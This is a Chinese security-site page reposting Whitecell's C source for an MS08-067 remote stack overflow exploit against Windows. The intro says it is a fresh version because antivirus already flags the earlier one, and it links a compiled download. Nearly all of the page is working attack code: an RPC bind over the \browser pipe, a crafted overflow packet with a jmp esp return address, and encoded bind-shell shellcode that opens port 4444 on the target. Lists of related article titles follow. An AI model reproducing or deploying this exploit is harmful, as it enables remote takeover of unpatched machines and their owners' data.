白细胞发布的最新的攻击代码,之前发布的攻击代码部分杀毒软件已经报了,这次发个新的上来。
WSS(Whitecell Security Systems),一个非营利性民间技术组织,致力于各种系统安全技术的研究。坚持传统的hacker精神,追求技术的精纯。
WSS 主页:http://www.whitecell.org/
WSS 论坛:http://www.whitecell.org/forums
直接下载已经编译好的版本:MS08-067 最新利用工具 WSS 白细胞发布 溢出后开启对方4444端口
#include "stdafx.h"
#include <winsock2.h>
#include <Rpc.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
#pragma comment(lib, "ws2_32")
struct RPCBIND
{
BYTE VerMaj;
BYTE VerMin;
BYTE PacketType;
BYTE PacketFlags;
DWORD DataRep;
WORD FragLength;
WORD AuthLength;
DWORD CallID;
WORD MaxXmitFrag;
WORD MaxRecvFrag;
DWORD AssocGroup;
BYTE NumCtxItems;
WORD ContextID;
WORD NumTransItems;
GUID InterfaceUUID;
WORD InterfaceVerMaj;
WORD InterfaceVerMin;
GUID TransferSyntax;
DWORD SyntaxVer;
};
struct RPCFUNC
{
BYTE VerMaj;
BYTE VerMin;
BYTE PacketType;
BYTE PacketFlags;
DWORD DataRep;
WORD FragLength;
WORD AuthLength;
DWORD CallID;
DWORD AllocHint;
WORD ContextID;
WORD Opnum;
};
BYTE PRPC[0x48] = {
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
BYTE EXPLOIT[] =
"\x05\x00"
"\x00\x03\x10\x00\x00\x00\xA4\x00\x00\x00\x01\x00\x00\x00\x94\x00"
"\x00\x00\x00\x00\x1f\x00"
"\x00\x00\x00\x00"
"\x2F\x00\x00\x00\x00\x00\x00\x00\x2F\x00\x00\x00"
"\x5c\x00"
"\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00"
"\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x12\x45\xfa\x7f" // jmp esp
"\x90\x8B\xF4\x81"
"\x3E\x90\x90\x90\x90\x74\x04\x4E\x4E\xEB\xF4\x33\xC9\x33\xDB\xB1"
"\x01\xC1\xE1\x09\x8B\xFC\x4B\xC1\xE3\x0D\x23\xFB\x57\xF3\xA4\x5F"
// "\xB1\x01\xC1\xE1\x09\x2B\xE1\xFF\xE7\x41\x41\x41\x41\x41\x41\x41"
"\x83\xEC\x70\x90\x90\x90\x90\xFF\xE7\x41\x41\x41\x41\x41\x41\x41"
"\x00\x00\x00\x00\x01\x00"
"\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5C\x00"
"\x00\x00"
"\x01\x00\x00\x00\x01\x00\x00\x00";
BYTE POP[] =//stub header RPCFUNC structure
"\x05\x00"
"\x00\x03\x10\x00\x00\x00\xE4\x01\x00\x00\x01\x00\x00\x00\xD4\x01"
"\x00\x00\x00\x00\x1f\x00"
"\x00\x00\x00\x00"
"\xCF\x00\x00\x00\x00\x00\x00\x00\xCF\x00\x00\x00"
"\x5c\x00"
"\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xCC\x41"
"\x00\x00\x00\x00\x01\x00"
"\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5C\x00"
"\x00\x00"
"\x01\x00\x00\x00\x01\x00\x00\x00";
unsigned char bind_shellcode[] =
// "\xCC"
// "\x83\xEC\x40" // sub esp, 0x70
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xad"
"\x07\xe6\x4a\x83\xeb\xfc\xe2\xf4\x51\x6d\x0d\x07\x45\xfe\x19\xb5"
"\x52\x67\x6d\x26\x89\x23\x6d\x0f\x91\x8c\x9a\x4f\xd5\x06\x09\xc1"
"\xe2\x1f\x6d\x15\x8d\x06\x0d\x03\x26\x33\x6d\x4b\x43\x36\x26\xd3"
"\x01\x83\x26\x3e\xaa\xc6\x2c\x47\xac\xc5\x0d\xbe\x96\x53\xc2\x62"
"\xd8\xe2\x6d\x15\x89\x06\x0d\x2c\x26\x0b\xad\xc1\xf2\x1b\xe7\xa1"
"\xae\x2b\x6d\xc3\xc1\x23\xfa\x2b\x6e\x36\x3d\x2e\x26\x44\xd6\xc1"
"\xed\x0b\x6d\x3a\xb1\xaa\x6d\x0a\xa5\x59\x8e\xc4\xe3\x09\x0a\x1a"
"\x52\xd1\x80\x19\xcb\x6f\xd5\x78\xc5\x70\x95\x78\xf2\x53\x19\x9a"
"\xc5\xcc\x0b\xb6\x96\x57\x19\x9c\xf2\x8e\x03\x2c\x2c\xea\xee\x48"
"\xf8\x6d\xe4\xb5\x7d\x6f\x3f\x43\x58\xaa\xb1\xb5\x7b\x54\xb5\x19"
"\xfe\x54\xa5\x19\xee\x54\x19\x9a\xcb\x6f\xf7\x16\xcb\x54\x6f\xab"
"\x38\x6f\x42\x50\xdd\xc0\xb1\xb5\x7b\x6d\xf6\x1b\xf8\xf8\x36\x22"
"\x09\xaa\xc8\xa3\xfa\xf8\x30\x19\xf8\xf8\x36\x22\x48\x4e\x60\x03"
"\xfa\xf8\x30\x1a\xf9\x53\xb3\xb5\x7d\x94\x8e\xad\xd4\xc1\x9f\x1d"
"\x52\xd1\xb3\xb5\x7d\x61\x8c\x2e\xcb\x6f\x85\x27\x24\xe2\x8c\x1a"
"\xf4\x2e\x2a\xc3\x4a\x6d\xa2\xc3\x4f\x36\x26\xb9\x07\xf9\xa4\x67"
"\x53\x45\xca\xd9\x20\x7d\xde\xe1\x06\xac\x8e\x38\x53\xb4\xf0\xb5"
"\xd8\x43\x19\x9c\xf6\x50\xb4\x1b\xfc\x56\x8c\x4b\xfc\x56\xb3\x1b"
"\x52\xd7\x8e\xe7\x74\x02\x28\x19\x52\xd1\x8c\xb5\x52\x30\x19\x9a"
"\x26\x50\x1a\xc9\x69\x63\x19\x9c\xff\xf8\x36\x22\x42\xc9\x06\x2a"
"\xfe\xf8\x30\xb5\x7d\x07\xe6\x4a";
int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer)
{
BYTE rbuf[0x1000]="";
DWORD dw=0;
struct RPCBIND RPCBind;
memcpy(&RPCBind,&PRPC,sizeof(RPCBind));
UuidFromString((unsigned char *)Interface,&RPCBind.InterfaceUUID);
UuidToString(&RPCBind.InterfaceUUID,(unsigned char **)&Interface);
RPCBind.InterfaceVerMaj=atoi(&InterfaceVer[0]);
RPCBind.InterfaceVerMin=atoi(&InterfaceVer[2]);
TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf,sizeof(rbuf), &dw, NULL);
return 0;
}
int main(int argc, char* argv[])
{
char *server;
NETRESOURCE nr;
char unc[MAX_PATH];
char szPipe[MAX_PATH];
HANDLE hFile;
WSADATA wsa;
int bwritten=0;
BYTE rbuf[0x100]="";
DWORD dw;
PVOID ptr = (PVOID)&POP;
printf( "\tMS08-067 Remote Stack Overflow Vulnerability Exploit(POC)\n\n" );
printf( "Create by Whitecell's Polymorphours@whitecell.org 2008/10/27\n" );
printf( "Thanks isno and PolyMeta\n" );
printf( "ShellCode Function: bindshell port:4444\n" );
printf( "usage:\n%s [IP]\n", argv[0] );
if ( argc != 2 ) {
return 0;
}
if ( WSAStartup(MAKEWORD(2,2),&wsa) != 0 ) {
printf( "WSAStartup failed\n" );
return 0;
}
memcpy((char *)ptr + 74, bind_shellcode, sizeof(bind_shellcode)-1);
server=argv[1];
_snprintf(unc, sizeof(unc), "\\\\%s\\pipe", server);
unc[sizeof(unc)-1] = 0;
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL;
nr.lpRemoteName = unc;
nr.lpProvider = NULL;
printf( "connect %s ipc$ .... ", server );
if ( WNetAddConnection2(&nr, "", "", 0) != 0 ) {
printf( "failed\n" );
return 0;
} else {
printf( "success!\n" );
}
_snprintf(szPipe, sizeof(szPipe),"\\\\%s\\pipe\\browser",server);
printf( "open \\\\%s\\pipe\\browser ....", server );
hFile = CreateFile( szPipe,
GENERIC_READ|GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING, 0, NULL);
if ( hFile == (HANDLE)-1 ) {
printf( "failed!\n" );
return 0;
} else {
printf( "success!\n" );
}
printf( "Bind Rpc 4b324fc8-1670-01d3-1278-5a47bf6ee188 Interface\n" );
BindRpcInterface(hFile,"4b324fc8-1670-01d3-1278-5a47bf6ee188","3.0");
printf( "Send shellcode ....\n" );
TransactNamedPipe(hFile, (PVOID)&POP, sizeof(POP) - 1, rbuf, sizeof(rbuf), &dw, NULL);
printf( "Send Exploit ...... \n" );
TransactNamedPipe(hFile, (PVOID)&EXPLOIT, sizeof(EXPLOIT) - 1, rbuf, sizeof(rbuf), &dw, NULL);
CloseHandle( hFile );
return 0;
}
上一篇:没有了 下一篇:没有了
·校内网木马清除方法(06-17)
·Windows7 RC中很有用处的安全策略(06-16)
·金山毒霸U盘专杀工具测试(06-15)
·文章采编 - 巧用Iris查找蠕虫病毒(图解)(06-15)
·奇闻:开两个QQ就能绕开绿坝限制(06-15)
·国外黑客网站发布绿坝最新漏洞攻击程序Green Da(06-13)
·注意:研究人员发现绿坝高危漏洞!(06-12)
·绿坝花季护航的小学生破解法(06-10)
·绿坝试用手记:可关闭可卸载拦截效果待提高(06-10)
·针对最近的DirectShow 0day的临时安全设置(06-06)
·Windows 7 中对AutoPlay的改进(05-27)
·预防网络病毒的八个忠告(05-11)
·Flashfxp不用任何工具就可以查看密码(05-06)
·卡巴斯基2010版发布Kaspersky Anti-Virus & Int(04-26)
·近期流行的usp10.dll病毒简单处理方法(04-03)
·绑定IE首页的流氓方法(03-26)
·九个小技巧能加强Linux桌面安全性(02-06)
·再一次感受到谷歌浏览器的安全与强大(12-18)
·IE XML Parsing Buffer Overflow Exploit (vist(12-15)
·VISTA禁用 Row Position 功能的操作步骤(12-14)
·Microsoft 安全通报:4 种方法暂时屏蔽 IE 最新(12-14)
·IE 0day漏洞的最新消息:所有版本的IE都受影响(12-14)
·"0x7ffa0eb8"指令引用的"0x7ffa0eb8"内存。该内(12-10)
·QQ弹窗病毒分析,伪造QQ系统信息(12-09)
·Vista下以保护模式(Low IL)运行Firefox(12-08)
·你有遇到http:///nhds/ipc.jsp?ref=1吗? (12-04)
·网页变成http:///nhds/ipc.jsp?ref=1的相关分析(12-04)
·升级flash插件,防范Flash动画恶意链接(12-03)
·四种方案全面保护你的视频安全(12-03)
·MS08-067 微软发布紧急安全更新KB958644,避免(3048)
·weiai.exe 病毒最新清除方法 图解 附带工具(2641)
·阿布教你如何通过20号的微软正版验证,防止系统(2599)
·应对20号微软正版验证,Office2003通过正版验证(1768)
·weiai15.exe 病毒最新清除方法 weiai.exe变种清(1642)
·教你如何删除“不能打开、不能删除”的文件夹(1628)
·gggggttt.cn最新病毒的查杀方法 附专杀工具下载(1512)
·用hamster在无线网中通过ferret抓包实现对Gmail(1460)
·ms08-067英文系统攻击代码 metasploit插件代码(1371)
·ms08067漏洞利用教程 附带工具下载(1286)
·创建“不能打开、不能删除”的文件夹,保护自己(981)
·禁用USB存储设备的方法汇总(954)
·"0x7ffa0eb8"指令引用的"0x7ffa0eb8"内存。该内(751)
·Generic Host Process for Win32 Services 报错(683)
·如何确定网络中IP地址被ARP协议欺骗盗用(586)
·MS08-067 check 扫描对方是否有ms08067漏洞(573)
·MS08-067 Remote Stack Overflow Vulnerability(548)
·反编译MS08-067漏洞(409)
·电信禁止ADSL路由器上网的破解方法(402)
·关于MS08-067漏洞的详细分析(382)
·反击ARP欺骗 讲述我和网络执法官的战斗(357)
·教你用好 McAfee 杀毒软件(351)
·Autorun.inf文件详解及免疫方法(317)
·局域网受ARP欺骗攻击后的解决方法(304)
·最新ESS 4.0 试用手记 - ESET Smart Security 4(304)
·黑客演示跨浏览器攻击 Clickjacking 劫持用户摄(291)
·QQ弹窗病毒分析,伪造QQ系统信息(285)
·MS08067补丁前后比较分析结果(284)
·最新truefile病毒清除方法(263)
